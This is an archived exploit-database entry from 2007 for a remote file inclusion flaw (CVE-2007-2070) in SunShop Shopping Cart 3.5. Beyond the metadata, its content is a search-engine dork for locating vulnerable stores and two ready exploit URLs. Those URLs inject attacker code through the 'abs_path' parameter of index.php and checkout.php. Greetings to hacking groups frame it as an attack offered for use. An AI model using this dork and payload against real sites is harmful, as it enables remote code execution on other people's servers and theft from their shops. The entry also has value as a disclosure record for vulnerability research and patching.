SunShop Shopping Cart 3.5 - 'abs_path' Remote File Inclusion
Author: irvian
type: webapps
platform: php
port:
date_added: 2007-04-15
date_updated: 2016-12-20
verified: 1
codes: OSVDB-37415;CVE-2007-2070;OSVDB-37414
tags:
aliases:
screenshot_url:
application_url:
sunshop 4 (index.php) Remote File Include Vulnerability
-----------------------------------------------------------------------------------------
# scripts : SunShop v3.5
# Discovered By : irvian
# scripts site : http://www.turnkeywebtools.com/sunshop/
# Thanks To : #hitamputih #nyubicrew #patihack
# special To : nyubi,ibnusina,arioo,jipank,kacung,trangkil,cah_gemblunkz,permenhack
# dork : "powered by sunshop"
------------------------------------------------------------------------------------------
bug found:
Exploit: www.target.com/index.php?abs_path=[evilcode]
www.target.com/checkout.php?abs_path=[evilcode]
# milw0rm.com [2007-04-16]